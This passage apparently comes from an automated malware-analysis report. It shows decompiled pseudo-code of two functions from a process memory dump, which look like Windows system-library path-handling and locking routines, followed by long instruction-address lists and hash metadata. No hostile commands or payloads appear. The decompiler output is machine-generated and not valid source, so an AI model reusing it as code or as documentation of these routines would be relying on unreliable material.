														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E015E52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E015FEB70(1, 0x16d79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E015FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016295D0();
																			L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0162B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01623D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0162B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                0x01604128
                                                0x01604135
                                                0x0160413c
                                                0x01604141
                                                0x01604145
                                                0x01604147
                                                0x0160414e
                                                0x01604151
                                                0x01604159
                                                0x0160415c
                                                0x01604160
                                                0x01604164
                                                0x01604168
                                                0x0160416c
                                                0x0160417f
                                                0x01604181
                                                0x0160446a
                                                0x0160446a
                                                0x0160418c
                                                0x01604195
                                                0x01604199
                                                0x01604432
                                                0x01604439
                                                0x0160443d
                                                0x01604442
                                                0x01604447
                                                0x00000000
                                                0x0160419f
                                                0x016041a3
                                                0x016041b1
                                                0x016041b9
                                                0x016041bd
                                                0x016045db
                                                0x016045db
                                                0x00000000
                                                0x016041c3
                                                0x016041c3
                                                0x016041ce
                                                0x016041d4
                                                0x0164e138
                                                0x0164e13e
                                                0x0164e169
                                                0x0164e16d
                                                0x0164e19e
                                                0x0164e16f
                                                0x0164e16f
                                                0x0164e175
                                                0x0164e179
                                                0x0164e18f
                                                0x0164e193
                                                0x00000000
                                                0x0164e199
                                                0x00000000
                                                0x0164e199
                                                0x0164e193
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016041da
                                                0x016041da
                                                0x016041df
                                                0x016041e4
                                                0x016041ec
                                                0x01604203
                                                0x01604207
                                                0x0164e1fd
                                                0x01604222
                                                0x01604226
                                                0x0164e1f3
                                                0x0164e1f3
                                                0x0160422c
                                                0x0160422c
                                                0x01604233
                                                0x0164e1ed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01604239
                                                0x01604239
                                                0x01604239
                                                0x01604239
                                                0x01604233
                                                0x01604226
                                                0x016041ee
                                                0x016041ee
                                                0x016041f4
                                                0x01604575
                                                0x0164e1b1
                                                0x0164e1b1
                                                0x00000000
                                                0x0160457b
                                                0x0160457b
                                                0x01604582
                                                0x0164e1ab
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01604588
                                                0x01604588
                                                0x0160458c
                                                0x0164e1c4
                                                0x0164e1c4
                                                0x00000000
                                                0x01604592
                                                0x01604592
                                                0x01604599
                                                0x0164e1be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0160459f
                                                0x0160459f
                                                0x016045a3
                                                0x0164e1d7
                                                0x0164e1e4
                                                0x00000000
                                                0x016045a9
                                                0x016045a9
                                                0x016045b0
                                                0x0164e1d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016045b6
                                                0x016045b6
                                                0x016045b6
                                                0x00000000
                                                0x016045b6
                                                0x016045b0
                                                0x016045a3
                                                0x01604599
                                                0x0160458c
                                                0x01604582
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016041f4
                                                0x0160423e
                                                0x01604241
                                                0x016045c0
                                                0x016045c4
                                                0x00000000
                                                0x016045ca
                                                0x016045ca
                                                0x00000000
                                                0x0164e207
                                                0x0164e20f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016045d1
                                                0x00000000
                                                0x00000000
                                                0x016045ca
                                                0x00000000
                                                0x01604247
                                                0x01604247
                                                0x01604247
                                                0x01604249
                                                0x01604249
                                                0x01604249
                                                0x01604251
                                                0x01604251
                                                0x01604257
                                                0x0160425f
                                                0x0160426e
                                                0x01604270
                                                0x0160427a
                                                0x0164e219
                                                0x0164e219
                                                0x01604280
                                                0x01604282
                                                0x01604456
                                                0x016045ea
                                                0x00000000
                                                0x016045f0
                                                0x0164e223
                                                0x00000000
                                                0x0164e223
                                                0x0160445c
                                                0x0160445c
                                                0x00000000
                                                0x0160445c
                                                0x00000000
                                                0x01604288
                                                0x0160428c
                                                0x0164e298
                                                0x01604292
                                                0x01604292
                                                0x0160429e
                                                0x016042a3
                                                0x016042a7
                                                0x016042ac
                                                0x0164e22d
                                                0x016042b2
                                                0x016042b2
                                                0x016042b9
                                                0x016042bc
                                                0x016042c2
                                                0x016042ca
                                                0x016042cd
                                                0x016042cd
                                                0x016042d4
                                                0x0160433f
                                                0x0160433f
                                                0x016042d6
                                                0x016042d6
                                                0x016042d9
                                                0x016042dd
                                                0x016042eb
                                                0x0164e23a
                                                0x016042f1
                                                0x01604305
                                                0x0160430d
                                                0x01604315
                                                0x01604318
                                                0x0160431f
                                                0x01604322
                                                0x0160432e
                                                0x0160433b
                                                0x0160433b
                                                0x00000000
                                                0x0160432e
                                                0x016042eb
                                                0x0160434c
                                                0x0160434e
                                                0x01604352
                                                0x01604359
                                                0x0160435e
                                                0x01604361
                                                0x0160436e
                                                0x0160438a
                                                0x0160438e
                                                0x01604396
                                                0x0160439e
                                                0x016043a1
                                                0x016043ad
                                                0x016043bb
                                                0x016043bb
                                                0x016043ad
                                                0x0160436e
                                                0x016043bf
                                                0x016043c5
                                                0x01604463
                                                0x01604463
                                                0x016043ce
                                                0x016043d5
                                                0x016043d9
                                                0x016043df
                                                0x01604475
                                                0x01604479
                                                0x01604491
                                                0x01604491
                                                0x01604479
                                                0x016043e5
                                                0x016043eb
                                                0x016043f4
                                                0x016043f6
                                                0x016043f9
                                                0x016043fc
                                                0x016043ff
                                                0x016044e8
                                                0x016044ed
                                                0x016044f3
                                                0x0164e247
                                                0x00000000
                                                0x016044f9
                                                0x01604504
                                                0x01604508
                                                0x0160450f
                                                0x0164e269
                                                0x00000000
                                                0x01604515
                                                0x01604519
                                                0x01604531
                                                0x01604534
                                                0x01604537
                                                0x0160453e
                                                0x01604541
                                                0x0160454a
                                                0x0164e255
                                                0x0164e255
                                                0x0164e25b
                                                0x0164e25e
                                                0x0164e261
                                                0x0164e261
                                                0x01604555
                                                0x01604559
                                                0x0160455d
                                                0x0164e26d
                                                0x0164e270
                                                0x0164e274
                                                0x0164e27a
                                                0x0164e27d
                                                0x0164e28e
                                                0x0164e28e
                                                0x01604563
                                                0x01604563
                                                0x01604569
                                                0x01604569
                                                0x00000000
                                                0x0160455d
                                                0x0160450f
                                                0x00000000
                                                0x016044f3
                                                0x016043ff
                                                0x01604405
                                                0x01604405
                                                0x01604405
                                                0x016042ac
                                                0x0160428c
                                                0x01604282
                                                0x01604407
                                                0x0160440d
                                                0x0164e2af
                                                0x0164e2af
                                                0x01604413
                                                0x01604413
                                                0x00000000
                                                0x016041d4
                                                0x00000000
                                                0x016041c3
                                                0x016041bd
                                                0x01604415
                                                0x01604415
                                                0x01604416
                                                0x01604417
                                                0x01604429
                                                0x0160416e
                                                0x0160416e
                                                0x01604175
                                                0x01604498
                                                0x0160449f
                                                0x0164e12d
                                                0x00000000
                                                0x0164e133
                                                0x00000000
                                                0x0164e133
                                                0x016044a5
                                                0x016044a5
                                                0x016044aa
                                                0x00000000
                                                0x016044bb
                                                0x016044ca
                                                0x016044d6
                                                0x016044d7
                                                0x016044d8
                                                0x016044e3
                                                0x016044e3
                                                0x016044aa
                                                0x0160417b
                                                0x0160417b
                                                0x0160417b
                                                0x00000000
                                                0x0160417b
                                                0x01604175
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da186fe7d26493758ea9669cd964a397d63d58a8289c098ad8ca238185645163
                                                • Instruction ID: aa33b2262056906faa7432c22299e3e4468182d70e645aea6552e5052e7cfb72
                                                • Opcode Fuzzy Hash: da186fe7d26493758ea9669cd964a397d63d58a8289c098ad8ca238185645163
                                                • Instruction Fuzzy Hash: 9FF15C706082118BD72ACF59C880A7BB7E1FF98714F05892EF685CB391EB35D895CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016120A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E016120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x16d8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01612EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01612EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E015E58EC(_t240);
									_t221 =  *0x16d5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x16d5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01624A2C(0x16d6e40, 0x1624b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01607D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x15c5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0161F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0161F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01667016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01602400(_t267 + 0x20);
															}
															L01602400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01612397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01602280(_t134, 0x16d8608);
									__eflags =  *0x16d6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E015FFFB0(_t198, _t241, 0x16d8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x16d6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x16d8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01616B90(_t210,  &_v64);
										_t262 =  *0x16d8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0161E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0162006A(0x16d8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x16d8608);
												E0162B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x16d6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x16d6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E015FFFB0(_t198, _t240, 0x16d8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016200C2(0x16d8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                0x016120a0
                                                0x016120a8
                                                0x016120ad
                                                0x016120b3
                                                0x016120b8
                                                0x016120c2
                                                0x016120c7
                                                0x016120cb
                                                0x016120d2
                                                0x01612263
                                                0x01612266
                                                0x01655836
                                                0x01655836
                                                0x00000000
                                                0x0161226c
                                                0x0161226c
                                                0x01612270
                                                0x01612274
                                                0x016120e2
                                                0x016120e2
                                                0x016120e6
                                                0x016120ee
                                                0x016557dc
                                                0x016557de
                                                0x016557ec
                                                0x016557ec
                                                0x016557f1
                                                0x016557f3
                                                0x016557f8
                                                0x00000000
                                                0x016557f8
                                                0x016557e0
                                                0x016557e4
                                                0x016557ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016557ea
                                                0x016120f4
                                                0x016120f4
                                                0x016120f8
                                                0x016120f8
                                                0x016120fc
                                                0x01612100
                                                0x01612106
                                                0x01612201
                                                0x01612206
                                                0x0161220b
                                                0x0161220e
                                                0x016122a9
                                                0x016122ac
                                                0x00000000
                                                0x00000000
                                                0x016122b2
                                                0x016122b5
                                                0x01655801
                                                0x01655806
                                                0x00000000
                                                0x00000000
                                                0x01655810
                                                0x01655815
                                                0x01655818
                                                0x00000000
                                                0x00000000
                                                0x0165581e
                                                0x016122bb
                                                0x016122bb
                                                0x01612218
                                                0x01612218
                                                0x0161221c
                                                0x01612220
                                                0x01612222
                                                0x016122c2
                                                0x016122c4
                                                0x016122dc
                                                0x016122dc
                                                0x016122e1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016122e7
                                                0x016122c8
                                                0x016122cd
                                                0x016122d3
                                                0x016122d6
                                                0x01655823
                                                0x01655825
                                                0x01655827
                                                0x00000000
                                                0x00000000
                                                0x0165582d
                                                0x00000000
                                                0x0165582d
                                                0x00000000
                                                0x01612228
                                                0x01612228
                                                0x00000000
                                                0x01612228
                                                0x01612222
                                                0x01612214
                                                0x01612214
                                                0x00000000
                                                0x01612114
                                                0x01612114
                                                0x01612114
                                                0x0161211a
                                                0x0161211c
                                                0x01612348
                                                0x0161234d
                                                0x01655840
                                                0x01655845
                                                0x01655848
                                                0x0165584e
                                                0x0165584e
                                                0x01655848
                                                0x01612353
                                                0x01612355
                                                0x01612388
                                                0x01612388
                                                0x01612368
                                                0x0161236a
                                                0x0161236c
                                                0x0161238f
                                                0x00000000
                                                0x0161236e
                                                0x0161236e
                                                0x0161218e
                                                0x0161218e
                                                0x01612191
                                                0x01612195
                                                0x01655a03
                                                0x01655a06
                                                0x01655a0c
                                                0x01655a0f
                                                0x01655a11
                                                0x01655a13
                                                0x01655a13
                                                0x01655a19
                                                0x01655a1f
                                                0x00000000
                                                0x0161219b
                                                0x0161219b
                                                0x016121a0
                                                0x01612282
                                                0x01612284
                                                0x01612284
                                                0x01612284
                                                0x01612284
                                                0x016121a6
                                                0x016121a9
                                                0x016121ac
                                                0x016121ae
                                                0x016121b3
                                                0x0161228b
                                                0x01612290
                                                0x01612379
                                                0x01612296
                                                0x01612298
                                                0x01612298
                                                0x01612290
                                                0x016121b9
                                                0x016121be
                                                0x016122a2
                                                0x016122a2
                                                0x016121c4
                                                0x016121c8
                                                0x016121cc
                                                0x016121d0
                                                0x016121d4
                                                0x016121de
                                                0x016121e3
                                                0x01655a29
                                                0x01655a2c
                                                0x00000000
                                                0x00000000
                                                0x01655a3b
                                                0x00000000
                                                0x016121e9
                                                0x016121e9
                                                0x016121e9
                                                0x016121ee
                                                0x016121f1
                                                0x01655a45
                                                0x01655a4b
                                                0x01655a52
                                                0x01655a58
                                                0x01655a5d
                                                0x01655a5f
                                                0x01655a71
                                                0x01655a61
                                                0x01655a6a
                                                0x01655a6a
                                                0x01655a76
                                                0x01655a79
                                                0x01655a7f
                                                0x01655a83
                                                0x01655a85
                                                0x01655a87
                                                0x01655a87
                                                0x01655a8c
                                                0x01655a91
                                                0x01655a97
                                                0x01655a9f
                                                0x01655aa0
                                                0x01655aa1
                                                0x01655aa6
                                                0x01655aab
                                                0x01655ab1
                                                0x01655ab3
                                                0x01655ab9
                                                0x01655aca
                                                0x01655ad4
                                                0x01655ad4
                                                0x01655ade
                                                0x01655ade
                                                0x01655aab
                                                0x01655a79
                                                0x01655a52
                                                0x016121f7
                                                0x016121f9
                                                0x016121fe
                                                0x016121fe
                                                0x016121e3
                                                0x01612195
                                                0x0161236c
                                                0x01612122
                                                0x01612122
                                                0x01612124
                                                0x01612231
                                                0x01612236
                                                0x01612236
                                                0x01612238
                                                0x01612238
                                                0x01612240
                                                0x01612242
                                                0x01612244
                                                0x016559fc
                                                0x0161218c
                                                0x0161218c
                                                0x00000000
                                                0x0161218c
                                                0x0161224a
                                                0x0161224f
                                                0x01612256
                                                0x01612304
                                                0x01612309
                                                0x0161230f
                                                0x0161231e
                                                0x0161231e
                                                0x0161231e
                                                0x01612320
                                                0x01612325
                                                0x0161232a
                                                0x0161232c
                                                0x0161233e
                                                0x0161233e
                                                0x00000000
                                                0x0161232c
                                                0x01612311
                                                0x01612317
                                                0x0161231a
                                                0x0161231c
                                                0x01612380
                                                0x01612380
                                                0x01612380
                                                0x01612384
                                                0x00000000
                                                0x00000000
                                                0x01612386
                                                0x00000000
                                                0x0161231c
                                                0x0161225c
                                                0x0161225c
                                                0x00000000
                                                0x0161225c
                                                0x0161212a
                                                0x01612134
                                                0x01612138
                                                0x0161213d
                                                0x01655858
                                                0x01655863
                                                0x01655863
                                                0x01655867
                                                0x0165586a
                                                0x00000000
                                                0x00000000
                                                0x0165586c
                                                0x0165586c
                                                0x01655871
                                                0x01655875
                                                0x01655877
                                                0x01655997
                                                0x0165599c
                                                0x016559a1
                                                0x016559a7
                                                0x016559a7
                                                0x00000000
                                                0x016559a7
                                                0x0165587d
                                                0x00000000
                                                0x0165588b
                                                0x0165588b
                                                0x01655890
                                                0x01655892
                                                0x01655894
                                                0x01655899
                                                0x0165589b
                                                0x016558a0
                                                0x016558a0
                                                0x016558aa
                                                0x016558b2
                                                0x016558b6
                                                0x016558be
                                                0x016558c6
                                                0x016558c9
                                                0x0165590d
                                                0x01655917
                                                0x0165591a
                                                0x0165591c
                                                0x01655920
                                                0x01655928
                                                0x0165592a
                                                0x0165592c
                                                0x0165592e
                                                0x0165592e
                                                0x016558cb
                                                0x016558cd
                                                0x016558d8
                                                0x016558e0
                                                0x016558f4
                                                0x016558fe
                                                0x016558fe
                                                0x0165593a
                                                0x0165593e
                                                0x01655940
                                                0x01655942
                                                0x00000000
                                                0x01655944
                                                0x01655944
                                                0x01655949
                                                0x0165594e
                                                0x0165594e
                                                0x01655953
                                                0x0165595b
                                                0x01655976
                                                0x01655976
                                                0x0165597a
                                                0x0165597f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01655981
                                                0x01655981
                                                0x01655981
                                                0x01655983
                                                0x01655988
                                                0x0165598d
                                                0x01655991
                                                0x01655991
                                                0x00000000
                                                0x0165595d
                                                0x0165595d
                                                0x01655963
                                                0x01655965
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01655967
